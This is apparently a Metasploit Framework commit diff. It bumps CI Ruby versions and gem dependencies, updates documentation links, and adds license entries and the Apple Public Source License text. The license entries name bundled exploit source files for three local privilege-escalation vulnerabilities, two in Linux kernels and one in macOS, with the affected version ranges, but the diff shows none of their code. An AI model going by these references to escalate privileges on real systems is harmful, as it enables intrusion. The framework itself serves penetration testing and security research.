automatic module_metadata_base.json update

Land #16946 , Add row indicator to show targets command
Land #17415 , macOS dirty cow priv esc
2023-02-02 12:03:09 -06:00 · 2023-02-02 17:26:53 +00:00 · 2023-02-02 12:15:19 -05:00 · 2023-02-02 17:02:48 +00:00 · 2023-02-02 16:12:19 +00:00 · 2023-02-02 11:11:06 -05:00
303 changed files with 14156 additions and 9405 deletions
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
+          - '2.7'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -48,7 +48,7 @@ jobs:
      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          working-directory: docs

@@ -59,7 +59,7 @@ jobs:
                  comment: `
                    Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

-                    - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+                    - [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
                    - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
                    - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
                  `
@@ -35,7 +35,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
+          - '2.7'

    name: Lint msftidy
    steps:
@@ -51,7 +51,7 @@ jobs:

      - uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
        env:
          BUNDLE_WITHOUT: "coverage development pcap"
@@ -67,6 +67,7 @@ jobs:
          - '2.7'
          - '3.0'
          - '3.1'
+          - '3.2'
        os:
          - ubuntu-20.04
          - ubuntu-latest
@@ -1,6 +1,6 @@
 # Contributing to Metasploit
 Thank you for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved.
+world -- a better place!  Before you get started, please review our [Code of Conduct](./CODE_OF_CONDUCT.md). This helps us ensure our community is positive and supportive for everyone involved.

 ## Code Free Contributions
 Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
@@ -15,9 +15,9 @@ Before we get into the details of contributing code, you should know there are m


 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.

-Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.

 Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
 will be closed. We need to ensure the code we're adding to master is written to a high standard.
@@ -83,7 +83,7 @@ If you need some more guidance, talk to the main body of open source contributor
 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!

-[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
+[Code of Conduct]:https://docs.metasploit.com/docs/code-of-conduct.html
 [Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
 [Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
 [help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
@@ -101,7 +101,7 @@ curve, so keep it up!
 [PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
-[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
+[module documentation]:https://docs.metasploit.com/docs/using-metasploit/basics/module-documentation.html
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://www.betterspecs.org/
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.0)
+    metasploit-framework (6.3.1)
      actionpack (~> 7.0)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -97,25 +97,25 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (7.0.4.1)
-      actionview (= 7.0.4.1)
-      activesupport (= 7.0.4.1)
+    actionpack (7.0.4.2)
+      actionview (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
      rack (~> 2.0, >= 2.2.0)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.4.1)
-      activesupport (= 7.0.4.1)
+    actionview (7.0.4.2)
+      activesupport (= 7.0.4.2)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.4.1)
-      activesupport (= 7.0.4.1)
-    activerecord (7.0.4.1)
-      activemodel (= 7.0.4.1)
-      activesupport (= 7.0.4.1)
-    activesupport (7.0.4.1)
+    activemodel (7.0.4.2)
+      activesupport (= 7.0.4.2)
+    activerecord (7.0.4.2)
+      activemodel (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
+    activesupport (7.0.4.2)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
@@ -127,22 +127,22 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.689.0)
-    aws-sdk-core (3.168.4)
+    aws-partitions (1.701.0)
+    aws-sdk-core (3.170.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.356.0)
+    aws-sdk-ec2 (1.362.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.73.0)
+    aws-sdk-iam (1.74.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.61.0)
+    aws-sdk-kms (1.62.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.117.2)
+    aws-sdk-s3 (1.119.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
@@ -155,7 +155,7 @@ GEM
    builder (3.2.4)
    byebug (11.1.3)
    coderay (1.1.3)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.2.0)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
@@ -186,7 +186,7 @@ GEM
      railties (>= 5.0.0)
    faker (3.1.0)
      i18n (>= 1.8.11, < 2)
-    faraday (2.7.2)
+    faraday (2.7.4)
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
@@ -230,12 +230,12 @@ GEM
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (5.0.0)
+    metasploit-concern (5.0.1)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.1)
+    metasploit-credential (6.0.2)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -245,12 +245,12 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (5.0.0)
+    metasploit-model (5.0.1)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
    metasploit-payloads (2.0.108)
-    metasploit_data_models (6.0.1)
+    metasploit_data_models (6.0.2)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -279,7 +279,7 @@ GEM
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.10)
+    nokogiri (1.14.1)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -313,7 +313,7 @@ GEM
    puma (6.0.2)
      nio4r (~> 2.0)
    racc (1.6.2)
-    rack (2.2.5)
+    rack (2.2.6.2)
    rack-protection (3.0.5)
      rack
    rack-test (2.0.2)
@@ -321,24 +321,24 @@ GEM
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.4)
+    rails-html-sanitizer (1.5.0)
      loofah (~> 2.19, >= 2.19.1)
-    railties (7.0.4.1)
-      actionpack (= 7.0.4.1)
-      activesupport (= 7.0.4.1)
+    railties (7.0.4.2)
+      actionpack (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
      zeitwerk (~> 2.5)
    rainbow (3.1.1)
    rake (13.0.6)
-    rasn1 (0.12.0)
+    rasn1 (0.12.1)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
    recog (3.0.3)
      nokogiri
-    redcarpet (3.5.1)
-    regexp_parser (2.6.1)
+    redcarpet (3.6.0)
+    regexp_parser (2.6.2)
    reline (0.3.2)
      io-console (~> 0.5)
    rex-arch (0.1.14)
@@ -349,12 +349,12 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.29)
+    rex-core (0.1.30)
    rex-encoder (0.1.6)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.36)
+    rex-exploitation (0.1.37)
      jsobfu
      metasm
      rex-arch
@@ -372,21 +372,21 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.9)
+    rex-random_identifier (0.1.10)
      rex-text
    rex-registry (0.1.4)
    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.45)
+    rex-socket (0.1.46)
      rex-core
-    rex-sslscan (0.1.8)
+    rex-sslscan (0.1.9)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.47)
+    rex-text (0.2.49)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -400,7 +400,7 @@ GEM
    rspec-expectations (3.12.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.2)
+    rspec-mocks (3.12.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
    rspec-rails (6.0.1)
@@ -414,16 +414,16 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.12.0)
-    rubocop (1.42.0)
+    rubocop (1.44.1)
      json (~> 2.3)
      parallel (~> 1.10)
-      parser (>= 3.1.2.1)
+      parser (>= 3.2.0.0)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
      rubocop-ast (>= 1.24.1, < 2.0)
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 3.0)
+      unicode-display_width (>= 2.4.0, < 3.0)
    rubocop-ast (1.24.1)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
@@ -431,7 +431,7 @@ GEM
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.3)
+    ruby_smb (3.2.4)
      bindata
      openssl-ccm
      openssl-cmac
@@ -453,7 +453,7 @@ GEM
      rack (~> 2.2, >= 2.2.4)
      rack-protection (= 3.0.5)
      tilt (~> 2.0)
-    sqlite3 (1.5.4)
+    sqlite3 (1.6.0)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    strptime (0.2.5)
@@ -467,7 +467,7 @@ GEM
    timecop (0.9.6)
    timeout (0.3.1)
    ttfunk (1.7.0)
-    tzinfo (2.0.5)
+    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2022.7)
      tzinfo (>= 1.0.0)
@@ -57,6 +57,20 @@ Copyright: 2018
 License: GNU GPL 3
 Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module

+Files: external/source/exploits/CVE-2022-1043/cve-2022-1043.c
+Copyright: 2022 Open Source Security, Inc.
+License: GNU GPL 2.0
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-1043, a local privilege escalation vulnerability in
+         Linux kernels 5.12-rc3 - 5.14-rc7.
+
+Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c
+Copyright: 2022 Open Source Security, Inc.
+License: GNU GPL 2.0
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-22942, a local privilege escalation vulnerability in
+         Linux kernels 4.14-rc1 - 5.17-rc1.
+
 Files: exteneral/source/exploits/CVE-2022-26904/*
 Copyright: 2022 Abdelhamid Naceri
 License: MIT
@@ -121,6 +135,13 @@ Purpose: The built result is used in:
           payloads/stages/windows/vncinject.rb
           payloads/stages/windows/x64/vncinject.rb

+Files: external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c
+Copyright: 1999-2007 Apple Inc.
+License: Apple
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-46689, a local privilege escalation vulnerability in
+         MacOSX versions (macOS dirty cow)
+
 Files: lib/anemone.rb
       lib/anemone/*
 Copyright: 2009 Vertive, Inc.
@@ -998,3 +1019,372 @@ License: Zlib
 2. Altered source versions must be plainly marked as such, and must not be
    misrepresented as being the original software.
 3. This notice may not be removed or altered from any source distribution.
+
+License: Apple
+APPLE PUBLIC SOURCE LICENSE
+Version 2.0 - August 6, 2003
+
+Please read this License carefully before downloading this software.
+By downloading or using this software, you are agreeing to be bound by
+the terms of this License. If you do not or cannot agree to the terms
+of this License, please do not download or use the software.
+
+1. General; Definitions. This License applies to any program or other
+work which Apple Computer, Inc. ("Apple") makes publicly available and
+which contains a notice placed by Apple identifying such program or
+work as "Original Code" and stating that it is subject to the terms of
+this Apple Public Source License version 2.0 ("License"). As used in
+this License:
+
+1.1 "Applicable Patent Rights" mean: (a) in the case where Apple is
+the grantor of rights, (i) claims of patents that are now or hereafter
+acquired, owned by or assigned to Apple and (ii) that cover subject
+matter contained in the Original Code, but only to the extent
+necessary to use, reproduce and/or distribute the Original Code
+without infringement; and (b) in the case where You are the grantor of
+rights, (i) claims of patents that are now or hereafter acquired,
+owned by or assigned to You and (ii) that cover subject matter in Your
+Modifications, taken alone or in combination with Original Code.
+
+1.2 "Contributor" means any person or entity that creates or
+contributes to the creation of Modifications.
+
+1.3 "Covered Code" means the Original Code, Modifications, the
+combination of Original Code and any Modifications, and/or any
+respective portions thereof.
+
+1.4 "Externally Deploy" means: (a) to sublicense, distribute or
+otherwise make Covered Code available, directly or indirectly, to
+anyone other than You; and/or (b) to use Covered Code, alone or as
+part of a Larger Work, in any way to provide a service, including but
+not limited to delivery of content, through electronic communication
+with a client other than You.
+
+1.5 "Larger Work" means a work which combines Covered Code or portions
+thereof with code not governed by the terms of this License.
+
+1.6 "Modifications" mean any addition to, deletion from, and/or change
+to, the substance and/or structure of the Original Code, any previous
+Modifications, the combination of Original Code and any previous
+Modifications, and/or any respective portions thereof. When code is
+released as a series of files, a Modification is: (a) any addition to
+or deletion from the contents of a file containing Covered Code;
+and/or (b) any new file or other representation of computer program
+statements that contains any part of Covered Code.
+
+1.7 "Original Code" means (a) the Source Code of a program or other
+work as originally made available by Apple under this License,
+including the Source Code of any updates or upgrades to such programs
+or works made available by Apple under this License, and that has been
+expressly identified by Apple as such in the header file(s) of such
+work; and (b) the object code compiled from such Source Code and
+originally made available by Apple under this License.
+
+1.8 "Source Code" means the human readable form of a program or other
+work that is suitable for making modifications to it, including all
+modules it contains, plus any associated interface definition files,
+scripts used to control compilation and installation of an executable
+(object code).
+
+1.9 "You" or "Your" means an individual or a legal entity exercising
+rights under this License. For legal entities, "You" or "Your"
+includes any entity which controls, is controlled by, or is under
+common control with, You, where "control" means (a) the power, direct
+or indirect, to cause the direction or management of such entity,
+whether by contract or otherwise, or (b) ownership of fifty percent
+(50%) or more of the outstanding shares or beneficial ownership of
+such entity.
+
+2. Permitted Uses; Conditions & Restrictions. Subject to the terms
+and conditions of this License, Apple hereby grants You, effective on
+the date You accept this License and download the Original Code, a
+world-wide, royalty-free, non-exclusive license, to the extent of
+Apple's Applicable Patent Rights and copyrights covering the Original
+Code, to do the following:
+
+2.1 Unmodified Code. You may use, reproduce, display, perform,
+internally distribute within Your organization, and Externally Deploy
+verbatim, unmodified copies of the Original Code, for commercial or
+non-commercial purposes, provided that in each instance:
+
+(a) You must retain and reproduce in all copies of Original Code the
+copyright and other proprietary notices and disclaimers of Apple as
+they appear in the Original Code, and keep intact all notices in the
+Original Code that refer to this License; and
+
+(b) You must include a copy of this License with every copy of Source
+Code of Covered Code and documentation You distribute or Externally
+Deploy, and You may not offer or impose any terms on such Source Code
+that alter or restrict this License or the recipients' rights
+hereunder, except as permitted under Section 6.
+
+2.2 Modified Code. You may modify Covered Code and use, reproduce,
+display, perform, internally distribute within Your organization, and
+Externally Deploy Your Modifications and Covered Code, for commercial
+or non-commercial purposes, provided that in each instance You also
+meet all of these conditions:
+
+(a) You must satisfy all the conditions of Section 2.1 with respect to
+the Source Code of the Covered Code;
+
+(b) You must duplicate, to the extent it does not already exist, the
+notice in Exhibit A in each file of the Source Code of all Your
+Modifications, and cause the modified files to carry prominent notices
+stating that You changed the files and the date of any change; and
+
+(c) If You Externally Deploy Your Modifications, You must make
+Source Code of all Your Externally Deployed Modifications either
+available to those to whom You have Externally Deployed Your
+Modifications, or publicly available. Source Code of Your Externally
+Deployed Modifications must be released under the terms set forth in
+this License, including the license grants set forth in Section 3
+below, for as long as you Externally Deploy the Covered Code or twelve
+(12) months from the date of initial External Deployment, whichever is
+longer. You should preferably distribute the Source Code of Your
+Externally Deployed Modifications electronically (e.g. download from a
+web site).
+
+2.3 Distribution of Executable Versions. In addition, if You
+Externally Deploy Covered Code (Original Code and/or Modifications) in
+object code, executable form only, You must include a prominent
+notice, in the code itself as well as in related documentation,
+stating that Source Code of the Covered Code is available under the
+terms of this License with information on how and where to obtain such
+Source Code.
+
+2.4 Third Party Rights. You expressly acknowledge and agree that
+although Apple and each Contributor grants the licenses to their
+respective portions of the Covered Code set forth herein, no
+assurances are provided by Apple or any Contributor that the Covered
+Code does not infringe the patent or other intellectual property
+rights of any other entity. Apple and each Contributor disclaim any
+liability to You for claims brought by any other entity based on
+infringement of intellectual property rights or otherwise. As a
+condition to exercising the rights and licenses granted hereunder, You
+hereby assume sole responsibility to secure any other intellectual
+property rights needed, if any. For example, if a third party patent
+license is required to allow You to distribute the Covered Code, it is
+Your responsibility to acquire that license before distributing the
+Covered Code.
+
+3. Your Grants. In consideration of, and as a condition to, the
+licenses granted to You under this License, You hereby grant to any
+person or entity receiving or distributing Covered Code under this
+License a non-exclusive, royalty-free, perpetual, irrevocable license,
+under Your Applicable Patent Rights and other intellectual property
+rights (other than patent) owned or controlled by You, to use,
+reproduce, display, perform, modify, sublicense, distribute and
+Externally Deploy Your Modifications of the same scope and extent as
+Apple's licenses under Sections 2.1 and 2.2 above.
+
+4. Larger Works. You may create a Larger Work by combining Covered
+Code with other code not governed by the terms of this License and
+distribute the Larger Work as a single product. In each such instance,
+You must make sure the requirements of this License are fulfilled for
+the Covered Code or any portion thereof.
+
+5. Limitations on Patent License. Except as expressly stated in
+Section 2, no other patent rights, express or implied, are granted by
+Apple herein. Modifications and/or Larger Works may require additional
+patent licenses from Apple which Apple may grant in its sole
+discretion.
+
+6. Additional Terms. You may choose to offer, and to charge a fee for,
+warranty, support, indemnity or liability obligations and/or other
+rights consistent with the scope of the license granted herein
+("Additional Terms") to one or more recipients of Covered Code.
+However, You may do so only on Your own behalf and as Your sole
+responsibility, and not on behalf of Apple or any Contributor. You
+must obtain the recipient's agreement that any such Additional Terms
+are offered by You alone, and You hereby agree to indemnify, defend
+and hold Apple and every Contributor harmless for any liability
+incurred by or claims asserted against Apple or such Contributor by
+reason of any such Additional Terms.
+
+7. Versions of the License. Apple may publish revised and/or new
+versions of this License from time to time. Each version will be given
+a distinguishing version number. Once Original Code has been published
+under a particular version of this License, You may continue to use it
+under the terms of that version. You may also choose to use such
+Original Code under the terms of any subsequent version of this
+License published by Apple. No one other than Apple has the right to
+modify the terms applicable to Covered Code created under this
+License.
+
+8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in
+part pre-release, untested, or not fully tested works. The Covered
+Code may contain errors that could cause failures or loss of data, and
+may be incomplete or contain inaccuracies. You expressly acknowledge
+and agree that use of the Covered Code, or any portion thereof, is at
+Your sole and entire risk. THE COVERED CODE IS PROVIDED "AS IS" AND
+WITHOUT WARRANTY, UPGRADES OR SUPPORT OF ANY KIND AND APPLE AND
+APPLE'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS "APPLE" FOR THE
+PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY DISCLAIM
+ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING, BUT
+NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF
+MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR
+PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD
+PARTY RIGHTS. APPLE AND EACH CONTRIBUTOR DOES NOT WARRANT AGAINST
+INTERFERENCE WITH YOUR ENJOYMENT OF THE COVERED CODE, THAT THE
+FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR REQUIREMENTS,
+THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED OR
+ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO
+ORAL OR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE
+AUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY.
+You acknowledge that the Covered Code is not intended for use in the
+operation of nuclear facilities, aircraft navigation, communication
+systems, or air traffic control machines in which case the failure of
+the Covered Code could lead to death, personal injury, or severe
+physical or environmental damage.
+
+9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO
+EVENT SHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL,
+SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING
+TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR
+ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,
+TORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF
+APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
+DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL PURPOSE OF ANY
+REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY OF
+INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY
+TO YOU. In no event shall Apple's total liability to You for all
+damages (other than as may be required by applicable law) under this
+License exceed the amount of fifty dollars ($50.00).
+
+10. Trademarks. This License does not grant any rights to use the
+trademarks or trade names "Apple", "Apple Computer", "Mac", "Mac OS",
+"QuickTime", "QuickTime Streaming Server" or any other trademarks,
+service marks, logos or trade names belonging to Apple (collectively
+"Apple Marks") or to any trademark, service mark, logo or trade name
+belonging to any Contributor. You agree not to use any Apple Marks in
+or as part of the name of products derived from the Original Code or
+to endorse or promote products derived from the Original Code other
+than as expressly permitted by and in strict compliance at all times
+with Apple's third party trademark usage guidelines which are posted
+at http://www.apple.com/legal/guidelinesfor3rdparties.html.
+
+11. Ownership. Subject to the licenses granted under this License,
+each Contributor retains all rights, title and interest in and to any
+Modifications made by such Contributor. Apple retains all rights,
+title and interest in and to the Original Code and any Modifications
+made by or on behalf of Apple ("Apple Modifications"), and such Apple
+Modifications will not be automatically subject to this License. Apple
+may, at its sole discretion, choose to license such Apple
+Modifications under this License, or on different terms from those
+contained in this License or may choose not to license them at all.
+
+12. Termination.
+
+12.1 Termination. This License and the rights granted hereunder will
+terminate:
+
+(a) automatically without notice from Apple if You fail to comply with
+any term(s) of this License and fail to cure such breach within 30
+days of becoming aware of such breach;
+
+(b) immediately in the event of the circumstances described in Section
+13.5(b); or
+
+(c) automatically without notice from Apple if You, at any time during
+the term of this License, commence an action for patent infringement
+against Apple; provided that Apple did not first commence
+an action for patent infringement against You in that instance.
+
+12.2 Effect of Termination. Upon termination, You agree to immediately
+stop any further use, reproduction, modification, sublicensing and
+distribution of the Covered Code. All sublicenses to the Covered Code
+which have been properly granted prior to termination shall survive
+any termination of this License. Provisions which, by their nature,
+should remain in effect beyond the termination of this License shall
+survive, including but not limited to Sections 3, 5, 8, 9, 10, 11,
+12.2 and 13. No party will be liable to any other for compensation,
+indemnity or damages of any sort solely as a result of terminating
+this License in accordance with its terms, and termination of this
+License will be without prejudice to any other right or remedy of
+any party.
+
+13. Miscellaneous.
+
+13.1 Government End Users. The Covered Code is a "commercial item" as
+defined in FAR 2.101. Government software and technical data rights in
+the Covered Code include only those rights customarily provided to the
+public as defined in this License. This customary commercial license
+in technical data and software is provided in accordance with FAR
+12.211 (Technical Data) and 12.212 (Computer Software) and, for
+Department of Defense purchases, DFAR 252.227-7015 (Technical Data --
+Commercial Items) and 227.7202-3 (Rights in Commercial Computer
+Software or Computer Software Documentation). Accordingly, all U.S.
+Government End Users acquire Covered Code with only those rights set
+forth herein.
+
+13.2 Relationship of Parties. This License will not be construed as
+creating an agency, partnership, joint venture or any other form of
+legal association between or among You, Apple or any Contributor, and
+You will not represent to the contrary, whether expressly, by
+implication, appearance or otherwise.
+
+13.3 Independent Development. Nothing in this License will impair
+Apple's right to acquire, license, develop, have others develop for
+it, market and/or distribute technology or products that perform the
+same or similar functions as, or otherwise compete with,
+Modifications, Larger Works, technology or products that You may
+develop, produce, market or distribute.
+
+13.4 Waiver; Construction. Failure by Apple or any Contributor to
+enforce any provision of this License will not be deemed a waiver of
+future enforcement of that or any other provision. Any law or
+regulation which provides that the language of a contract shall be
+construed against the drafter will not apply to this License.
+
+13.5 Severability. (a) If for any reason a court of competent
+jurisdiction finds any provision of this License, or portion thereof,
+to be unenforceable, that provision of the License will be enforced to
+the maximum extent permissible so as to effect the economic benefits
+and intent of the parties, and the remainder of this License will
+continue in full force and effect. (b) Notwithstanding the foregoing,
+if applicable law prohibits or restricts You from fully and/or
+specifically complying with Sections 2 and/or 3 or prevents the
+enforceability of either of those Sections, this License will
+immediately terminate and You must immediately discontinue any use of
+the Covered Code and destroy all copies of it that are in your
+possession or control.
+
+13.6 Dispute Resolution. Any litigation or other dispute resolution
+between You and Apple relating to this License shall take place in the
+Northern District of California, and You and Apple hereby consent to
+the personal jurisdiction of, and venue in, the state and federal
+courts within that District with respect to this License. The
+application of the United Nations Convention on Contracts for the
+International Sale of Goods is expressly excluded.
+
+13.7 Entire Agreement; Governing Law. This License constitutes the
+entire agreement between the parties with respect to the subject
+matter hereof. This License shall be governed by the laws of the
+United States and the State of California, except that body of
+California law concerning conflicts of law.
+
+Where You are located in the province of Quebec, Canada, the following
+clause applies: The parties hereby confirm that they have requested
+that this License and all related documents be drafted in English. Les
+parties ont exige que le present contrat et tous les documents
+connexes soient rediges en anglais.
+
+EXHIBIT A.
+
+"Portions Copyright (c) 1999-2003 Apple Computer, Inc. All Rights
+Reserved.
+
+This file contains Original Code and/or Modifications of Original Code
+as defined in and that are subject to the Apple Public Source License
+Version 2.0 (the 'License'). You may not use this file except in
+compliance with the License. Please obtain a copy of the License at
+http://www.opensource.apple.com/apsl/ and read it before using this
+file.
+
+The Original Code and all software distributed under the License are
